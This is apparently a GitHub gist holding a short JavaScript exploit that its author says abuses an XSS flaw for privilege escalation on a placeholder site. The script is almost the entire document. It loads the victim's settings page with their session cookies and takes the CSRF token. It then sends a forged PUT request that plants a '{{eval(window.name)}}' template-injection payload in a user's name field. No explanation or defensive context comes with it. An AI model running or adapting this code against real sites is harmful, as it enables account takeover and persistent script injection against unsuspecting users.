Skip to content

Instantly share code, notes, and snippets.

@shawarkhanethicalhacker

shawarkhanethicalhacker/XSS_Privilege_Escalation.js

Created August 4, 2019 14:04
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save shawarkhanethicalhacker/7efedd3669237b4fbb69e43c36935ac0 to your computer and use it in GitHub Desktop.
Save shawarkhanethicalhacker/7efedd3669237b4fbb69e43c36935ac0 to your computer and use it in GitHub Desktop.
Download ZIP
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
Raw
XSS_Privilege_Escalation.js
// XSS Exploit code for Privilege Escalation
// Author: Shawar Khan
var woot = document.createElement('html');
fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){
woot.innerHTML=data;
var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
privilege_escalate();
function privilege_escalate(){
var req = new XMLHttpRequest();
req.open('POST','https://vulnerablesite.com/users/mrs-camylle-kertzmazevalwindowname',true);
req.withCredentials = true;
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send('_method=PUT&_token='+csrf_token+'&name=Mrs.+Camylle+Kertzmaz%7B%7Beval%28window.name%29%7D%7D&email=user%40example.org&phone=&csc=1');
}
}
)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment